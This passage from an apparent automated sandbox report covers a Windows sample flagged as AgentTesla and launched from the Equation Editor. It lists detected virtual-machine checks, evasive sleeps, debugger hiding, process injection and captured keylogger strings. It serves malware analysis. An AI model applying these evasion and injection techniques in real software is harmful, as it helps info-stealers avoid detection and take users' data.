Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\twox67345.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\twox67345.exe Window / User API: threadDelayed 7353 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Window / User API: threadDelayed 2687 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2380 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 2844 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 2808 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 1924 Thread sleep time: -13835058055282155s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 1928 Thread sleep count: 7353 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 1928 Thread sleep count: 234 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 1408 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 1464 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 2144 Thread sleep count: 2687 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 1880 Thread sleep count: 130 > 30 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\twox67345.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\twox67345.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\twox67345.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\twox67345.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Last function: Thread delayed
Source: UGxXf.exe, 0000000B.00000002.2329868830.00000000006EA000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\twox67345.exe Code function: 9_2_00617128 LdrInitializeThunk,LdrInitializeThunk, 9_2_00617128
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\twox67345.exe Memory written: C:\Users\user\AppData\Roaming\twox67345.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Memory written: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1 Jump to behavior
Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmp Binary or memory string: <br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>r
Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmp Binary or memory string: Program Manager48
Source: twox67345.exe, 00000009.00000002.2359872693.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmp Binary or memory string: my<br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br>|
Source: twox67345.exe, 00000009.00000002.2359872693.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: twox67345.exe, 00000009.00000002.2360374294.000000000283C000.00000004.00000001.sdmp Binary or memory string: Time: 02/23/2021 16:55:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>r
Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmp Binary or memory string: <br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>
Source: twox67345.exe, 00000009.00000002.2359872693.0000000000E80000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: twox67345.exe, 00000009.00000002.2360374294.000000000283C000.00000004.00000001.sdmp Binary or memory string: Time: 02/23/2021 16:55:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>r\

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\twox67345.exe Queries volume information: C:\Users\user\AppData\Roaming\twox67345.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Queries volume information: C:\Users\user\AppData\Roaming\twox67345.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Queries volume information: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Queries volume information: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Queries volume information: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
